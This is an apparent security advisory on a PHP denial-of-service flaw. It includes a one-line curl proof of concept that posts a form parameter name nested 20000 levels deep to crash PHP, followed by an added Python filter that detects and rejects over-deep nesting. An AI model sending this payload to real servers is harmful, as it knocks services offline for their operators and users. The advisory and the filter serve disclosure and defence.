11 lines
No EOL
692 B
Text
source: https://www.securityfocus.com/bid/22766/info

PHP is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input.

An attacker with permissions to execute PHP code on an affected computer may exploit this issue to crash PHP and kill all remaining webserver threads. This will result in denial-of-service conditions.

Although this issue is local in nature, a remote attacker may exploit it by using other latent vulnerabilities such as a remote file-include issue; other remote attack vectors are also possible.

This issue affects all versions of PHP.

$ curl http://www.example.com/phpmyadmin/ -d a`php -r 'echo str_repeat("[a]",20000);'`=1
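
The request above posts a form parameter whose name carries 20000 "[a]" subscripts. The following is an added example, not part of the original advisory: a pre-filter that measures the array nesting depth of parameter names in a urlencoded request body so over-deep requests can be rejected or logged before they reach PHP. The function names and the sample bodies are constructed for illustration, and the limit of 64 is an assumption chosen to match the default of PHP's max_input_nesting_level setting.

```python
from urllib.parse import unquote_plus

# Assumption: 64 mirrors the default of PHP's max_input_nesting_level.
MAX_NESTING = 64


def key_depth(key: str) -> int:
    """Count the array levels a parameter name such as a[b][c] would create."""
    i = key.find("[")
    if i == -1:
        return 0
    depth = 0
    # Only consecutive [..] groups count; anything after a gap is ignored.
    while i < len(key) and key[i] == "[":
        close = key.find("]", i + 1)
        if close == -1:          # unterminated subscript: stop counting
            break
        depth += 1
        i = close + 1
    return depth


def max_body_depth(body: str) -> int:
    """Return the deepest nesting among all parameter names in the body."""
    deepest = 0
    for pair in body.split("&"):
        if not pair:
            continue
        # Decode the name only; brackets may arrive as %5B / %5D.
        name = unquote_plus(pair.split("=", 1)[0])
        deepest = max(deepest, key_depth(name))
    return deepest


def should_reject(body: str, limit: int = MAX_NESTING) -> bool:
    """True when any parameter name nests deeper than the limit."""
    return max_body_depth(body) > limit


if __name__ == "__main__":
    # Constructed sample bodies: a normal form post and the shape used above.
    samples = {
        "normal form": "user=alice&opts[theme][color]=dark",
        "percent-encoded": "a%5Bx%5D%5By%5D%5Bz%5D=1",
        "deeply nested": "a" + "[a]" * 20000 + "=1",
    }
    for label, body in samples.items():
        verdict = "reject" if should_reject(body) else "allow"
        print(f"{label}: depth={max_body_depth(body)} -> {verdict}")
```
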